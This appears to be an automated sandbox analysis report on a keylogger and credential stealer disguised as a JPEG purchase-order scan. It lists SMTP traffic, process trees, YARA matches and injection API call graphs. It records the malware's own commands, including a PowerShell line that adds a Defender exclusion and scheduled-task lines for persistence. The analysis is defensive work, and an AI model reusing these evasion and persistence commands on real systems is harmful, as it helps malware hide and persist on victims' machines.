                                                                                                      Oct 25, 2024 09:18:26.238082886 CEST  587          49779      104.243.33.38  192.168.2.4    220-gracious.crystalwebhosting.com ESMTP Exim 4.98 #2 Fri, 25 Oct 2024 03:18:26 -0400
                                                                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                          220 and/or bulk e-mail.
                                                                                                      Oct 25, 2024 09:18:26.239008904 CEST  49779        587        192.168.2.4    104.243.33.38  EHLO 927537
                                                                                                      Oct 25, 2024 09:18:26.403197050 CEST  587          49779      104.243.33.38  192.168.2.4    250-gracious.crystalwebhosting.com Hello 927537 [173.254.250.81]
                                                                                                                                                                                          250-SIZE 52428800
                                                                                                                                                                                          250-LIMITS MAILMAX=1000 RCPTMAX=50000
                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                          250-PIPECONNECT
                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                          250 HELP
                                                                                                      Oct 25, 2024 09:18:26.403522015 CEST  49779        587        192.168.2.4    104.243.33.38  STARTTLS
                                                                                                      Oct 25, 2024 09:18:26.571563959 CEST  587          49779      104.243.33.38  192.168.2.4    220 TLS go ahead
                                                                                                      Oct 25, 2024 09:18:30.363224030 CEST  587          49780      104.243.33.38  192.168.2.4    220-gracious.crystalwebhosting.com ESMTP Exim 4.98 #2 Fri, 25 Oct 2024 03:18:30 -0400
                                                                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                          220 and/or bulk e-mail.
                                                                                                      Oct 25, 2024 09:18:30.363590956 CEST  49780        587        192.168.2.4    104.243.33.38  EHLO 927537
                                                                                                      Oct 25, 2024 09:18:30.525639057 CEST  587          49780      104.243.33.38  192.168.2.4    250-gracious.crystalwebhosting.com Hello 927537 [173.254.250.81]
                                                                                                                                                                                          250-SIZE 52428800
                                                                                                                                                                                          250-LIMITS MAILMAX=1000 RCPTMAX=50000
                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                          250-PIPECONNECT
                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                          250 HELP
                                                                                                      Oct 25, 2024 09:18:30.526115894 CEST  49780        587        192.168.2.4    104.243.33.38  STARTTLS
                                                                                                      Oct 25, 2024 09:18:30.688656092 CEST  587          49780      104.243.33.38  192.168.2.4    220 TLS go ahead


                                                                                                      Target ID:0
                                                                                                      Start time:03:17:58
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe"
                                                                                                      Imagebase:0xd30000
                                                                                                      File size:835'592 bytes
                                                                                                      MD5 hash:52F14C343D0B2EC1426E775C6B6569FF
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:03:18:01
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"
                                                                                                      Imagebase:0xf00000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:03:18:01
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:03:18:01
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp"
                                                                                                      Imagebase:0xb50000
                                                                                                      File size:187'904 bytes
                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:03:18:01
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:6
                                                                                                      Start time:03:18:01
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe"
                                                                                                      Imagebase:0x8b0000
                                                                                                      File size:835'592 bytes
                                                                                                      MD5 hash:52F14C343D0B2EC1426E775C6B6569FF
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      Target ID:7
                                                                                                      Start time:03:18:02
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                      Imagebase:0x7ff693ab0000
                                                                                                      File size:496'640 bytes
                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:8
                                                                                                      Start time:03:18:03
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      Imagebase:0x890000
                                                                                                      File size:835'592 bytes
                                                                                                      MD5 hash:52F14C343D0B2EC1426E775C6B6569FF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      • Detection: 50%, ReversingLabs
                                                                                                      Has exited:true

                                                                                                      Target ID:9
                                                                                                      Start time:03:18:05
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp"
                                                                                                      Imagebase:0xb50000
                                                                                                      File size:187'904 bytes
                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:10
                                                                                                      Start time:03:18:06
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:11
                                                                                                      Start time:03:18:06
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"
                                                                                                      Imagebase:0x7a0000
                                                                                                      File size:835'592 bytes
                                                                                                      MD5 hash:52F14C343D0B2EC1426E775C6B6569FF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Has exited:false


                                                                                                        Execution Graph

                                                                                                        Execution Coverage:9.9%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:230
                                                                                                        Total number of Limit Nodes:9
                                                                                                        execution_graph: [rendered node/edge listing of the execution graph omitted; only the graph's Windows API call nodes are recoverable from the extracted data]
                                                                                                        • API nodes present in the graph: CallWindowProcW, CreateWindowExW, GetModuleHandleW, PostMessageW, CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0&
                                                                                                        • API String ID: 0-766115343
                                                                                                        • Opcode ID: 6cd00cc168efec4a44d2a1d0a7dbc2757fe0a97b62f003e13acd7cfa901361f2
                                                                                                        • Instruction ID: d18c1767c0b459861aa1da516e37081d9121d394495c5b0087760ab2b95143f4
                                                                                                        • Opcode Fuzzy Hash: 6cd00cc168efec4a44d2a1d0a7dbc2757fe0a97b62f003e13acd7cfa901361f2
                                                                                                        • Instruction Fuzzy Hash: 16E12874E051198FCB14DFA9D5909AEBBB2FF89304F248169E405AB356D734AD81CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0561773f6093637d1e80b44848c67b7a37d765410da098629de99b80200d0ad1
                                                                                                        • Instruction ID: 08171c1ab97b5ac05c06444922fda9434f07ff5649328fc15d1131f1e81350d5
                                                                                                        • Opcode Fuzzy Hash: 0561773f6093637d1e80b44848c67b7a37d765410da098629de99b80200d0ad1
                                                                                                        • Instruction Fuzzy Hash: CDE1AC71B026048FDB15DBB6D4A0BAE77F6AFA9300F24446EE149DB2A4DB34DC01CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5bc0e398c2f045d00f306e40adb1ef4dc7efb4cd0ffb1f0fc8bd1c3a56f7325c
                                                                                                        • Instruction ID: c4a4e68bdd36b38ba72379c8f7ef386c5d2e8f8a475b895aeed0009e62425c93
                                                                                                        • Opcode Fuzzy Hash: 5bc0e398c2f045d00f306e40adb1ef4dc7efb4cd0ffb1f0fc8bd1c3a56f7325c
                                                                                                        • Instruction Fuzzy Hash: 87A00204FDE01886D0099D9018D11F8C07C173B005F42700CB10A730424B58E82B201C

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 535 c1c75f4-c1c7695 538 c1c76ce-c1c76ee 535->538 539 c1c7697-c1c76a1 535->539 546 c1c7727-c1c7756 538->546 547 c1c76f0-c1c76fa 538->547 539->538 540 c1c76a3-c1c76a5 539->540 541 c1c76c8-c1c76cb 540->541 542 c1c76a7-c1c76b1 540->542 541->538 544 c1c76b5-c1c76c4 542->544 545 c1c76b3 542->545 544->544 548 c1c76c6 544->548 545->544 555 c1c778f-c1c7849 CreateProcessA 546->555 556 c1c7758-c1c7762 546->556 547->546 549 c1c76fc-c1c76fe 547->549 548->541 551 c1c7700-c1c770a 549->551 552 c1c7721-c1c7724 549->552 553 c1c770c 551->553 554 c1c770e-c1c771d 551->554 552->546 553->554 554->554 557 c1c771f 554->557 567 c1c784b-c1c7851 555->567 568 c1c7852-c1c78d8 555->568 556->555 558 c1c7764-c1c7766 556->558 557->552 560 c1c7768-c1c7772 558->560 561 c1c7789-c1c778c 558->561 562 c1c7774 560->562 563 c1c7776-c1c7785 560->563 561->555 562->563 563->563 565 c1c7787 563->565 565->561 567->568 578 c1c78e8-c1c78ec 568->578 579 c1c78da-c1c78de 568->579 580 c1c78fc-c1c7900 578->580 581 c1c78ee-c1c78f2 578->581 579->578 582 c1c78e0 579->582 584 c1c7910-c1c7914 580->584 585 c1c7902-c1c7906 580->585 581->580 583 c1c78f4 581->583 582->578 583->580 587 c1c7926-c1c792d 584->587 588 c1c7916-c1c791c 584->588 585->584 586 c1c7908 585->586 586->584 589 c1c792f-c1c793e 587->589 590 c1c7944 587->590 588->587 589->590 591 c1c7945 590->591 591->591
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0C1C7836
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 3ab7eae77e17ddb0319e0393a5f5b903f9df225a41e036688c2ba4ef487c3609
                                                                                                        • Instruction ID: 261dd6e9c3037749656f1c49118376352d1ec11b44228f1d14c2b7ff1a4f9afb
                                                                                                        • Opcode Fuzzy Hash: 3ab7eae77e17ddb0319e0393a5f5b903f9df225a41e036688c2ba4ef487c3609
                                                                                                        • Instruction Fuzzy Hash: B3A17C71E00219DFDB20DFA9C8807EDBBB2FF54314F1485A9E848A7290DBB49995CF91

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 593 c1c7600-c1c7695 595 c1c76ce-c1c76ee 593->595 596 c1c7697-c1c76a1 593->596 603 c1c7727-c1c7756 595->603 604 c1c76f0-c1c76fa 595->604 596->595 597 c1c76a3-c1c76a5 596->597 598 c1c76c8-c1c76cb 597->598 599 c1c76a7-c1c76b1 597->599 598->595 601 c1c76b5-c1c76c4 599->601 602 c1c76b3 599->602 601->601 605 c1c76c6 601->605 602->601 612 c1c778f-c1c7849 CreateProcessA 603->612 613 c1c7758-c1c7762 603->613 604->603 606 c1c76fc-c1c76fe 604->606 605->598 608 c1c7700-c1c770a 606->608 609 c1c7721-c1c7724 606->609 610 c1c770c 608->610 611 c1c770e-c1c771d 608->611 609->603 610->611 611->611 614 c1c771f 611->614 624 c1c784b-c1c7851 612->624 625 c1c7852-c1c78d8 612->625 613->612 615 c1c7764-c1c7766 613->615 614->609 617 c1c7768-c1c7772 615->617 618 c1c7789-c1c778c 615->618 619 c1c7774 617->619 620 c1c7776-c1c7785 617->620 618->612 619->620 620->620 622 c1c7787 620->622 622->618 624->625 635 c1c78e8-c1c78ec 625->635 636 c1c78da-c1c78de 625->636 637 c1c78fc-c1c7900 635->637 638 c1c78ee-c1c78f2 635->638 636->635 639 c1c78e0 636->639 641 c1c7910-c1c7914 637->641 642 c1c7902-c1c7906 637->642 638->637 640 c1c78f4 638->640 639->635 640->637 644 c1c7926-c1c792d 641->644 645 c1c7916-c1c791c 641->645 642->641 643 c1c7908 642->643 643->641 646 c1c792f-c1c793e 644->646 647 c1c7944 644->647 645->644 646->647 648 c1c7945 647->648 648->648
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0C1C7836
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 9d5e7a1df0935e9e223f4419ca4432dabcfcf396870d01560389276c2370e228
                                                                                                        • Instruction ID: f76a254ec25ea27530204d36b4dc1ecd66bc874d4daff9ebaa9ad132f079d492
                                                                                                        • Opcode Fuzzy Hash: 9d5e7a1df0935e9e223f4419ca4432dabcfcf396870d01560389276c2370e228
                                                                                                        • Instruction Fuzzy Hash: DA916C71E00219DFDB10DFA9C8807EDBBB2FF54314F1485A9E848A7290DBB49995CF91

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 650 5684b84-5684bf6 652 5684bf8-5684bfe 650->652 653 5684c01-5684c08 650->653 652->653 654 5684c0a-5684c10 653->654 655 5684c13-5684c4b 653->655 654->655 656 5684c53-5684cb2 CreateWindowExW 655->656 657 5684cbb-5684cf3 656->657 658 5684cb4-5684cba 656->658 662 5684d00 657->662 663 5684cf5-5684cf8 657->663 658->657 664 5684d01 662->664 663->662 664->664
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05684CA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735562879.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5680000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: 81997fbaf8aee7eabfe5575e0d4e103a5e163378400e18cea91a477bd67905fe
                                                                                                        • Instruction ID: 389cccf8c07454ecf4093b70e10f7bd13c1f347b38274541edbbbefa06f58864
                                                                                                        • Opcode Fuzzy Hash: 81997fbaf8aee7eabfe5575e0d4e103a5e163378400e18cea91a477bd67905fe
                                                                                                        • Instruction Fuzzy Hash: 1A51B0B1D103099FDF14DF99C984ADEBBB5FF48314F24822AE419AB210D7759845CF91

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 773 5684b90-5684bf6 774 5684bf8-5684bfe 773->774 775 5684c01-5684c08 773->775 774->775 776 5684c0a-5684c10 775->776 777 5684c13-5684cb2 CreateWindowExW 775->777 776->777 779 5684cbb-5684cf3 777->779 780 5684cb4-5684cba 777->780 784 5684d00 779->784 785 5684cf5-5684cf8 779->785 780->779 786 5684d01 784->786 785->784 786->786
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05684CA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735562879.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5680000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: 80d7eef34cf87ce6513b398fa621f7407ac438b34c0b55921690bfe5b5053192
                                                                                                        • Instruction ID: f735f1a69e211d93adb275a7a154da13b649463a7e05c701c8a137445984d23b
                                                                                                        • Opcode Fuzzy Hash: 80d7eef34cf87ce6513b398fa621f7407ac438b34c0b55921690bfe5b5053192
                                                                                                        • Instruction Fuzzy Hash: 1C41C1B1D003099FDF14DF99C984ADEBBB5FF48314F24822AE819AB210DB759845CF90

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 787 56827fc-568719c 790 568724c-568726c call 56826d4 787->790 791 56871a2-56871a7 787->791 798 568726f-568727c 790->798 793 56871a9-56871e0 791->793 794 56871fa-5687232 CallWindowProcW 791->794 800 56871e9-56871f8 793->800 801 56871e2-56871e8 793->801 796 568723b-568724a 794->796 797 5687234-568723a 794->797 796->798 797->796 800->798 801->800
                                                                                                        APIs
                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05687221
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735562879.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5680000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallProcWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714655100-0
                                                                                                        • Opcode ID: 66c987ac30a08415d4aef77276d34e49b835a38de23c0e7dcb1aeb3804daffd4
                                                                                                        • Instruction ID: 76106f2d4f313a97eecbbe9e143f4d0d8ce9fe85ffc58ad58d3dfb3895f2b0c7
                                                                                                        • Opcode Fuzzy Hash: 66c987ac30a08415d4aef77276d34e49b835a38de23c0e7dcb1aeb3804daffd4
                                                                                                        • Instruction Fuzzy Hash: C14129B4900209CFCB14DF99C488AAABBF5FB88314F24C559E559AB321D775A941CFA0

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 804 1416914-1419081 CreateActCtxA 807 1419083-1419089 804->807 808 141908a-14190e4 804->808 807->808 815 14190f3-14190f7 808->815 816 14190e6-14190e9 808->816 817 14190f9-1419105 815->817 818 1419108 815->818 816->815 817->818
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 01419071
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1731693603.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1410000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: 7bfbee1476b8b68d1c20f22fa82cc4d5b28f8cfa41cf2b86e2db81220a6c4409
                                                                                                        • Instruction ID: 96b87303c6c3314a98362c8f4b0c033cad0b286784914644432abc086c336ec1
                                                                                                        • Opcode Fuzzy Hash: 7bfbee1476b8b68d1c20f22fa82cc4d5b28f8cfa41cf2b86e2db81220a6c4409
                                                                                                        • Instruction Fuzzy Hash: EC41D4B0C00619CFDB24DFA9C844BDEBBF5BF45304F24805AD408AB265DB756986CF90

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 820 c1c7374-c1c73c6 823 c1c73c8-c1c73d4 820->823 824 c1c73d6-c1c7415 WriteProcessMemory 820->824 823->824 826 c1c741e-c1c744e 824->826 827 c1c7417-c1c741d 824->827 827->826
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0C1C7408
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 6a3adc477156a4129002e6f07847d11f1f1a6c678541a88632027315778bf27c
                                                                                                        • Instruction ID: fabcb109cbcd1ac0be4c82044d9928553545c04b23b45c3cbbfcddd00d9d0357
                                                                                                        • Opcode Fuzzy Hash: 6a3adc477156a4129002e6f07847d11f1f1a6c678541a88632027315778bf27c
                                                                                                        • Instruction Fuzzy Hash: 322137B1A003599FCB10DFA9C985BDEBBF5FF48310F10842AE958A7251D7B89544CFA4

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 831 c1c7378-c1c73c6 833 c1c73c8-c1c73d4 831->833 834 c1c73d6-c1c7415 WriteProcessMemory 831->834 833->834 836 c1c741e-c1c744e 834->836 837 c1c7417-c1c741d 834->837 837->836
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0C1C7408
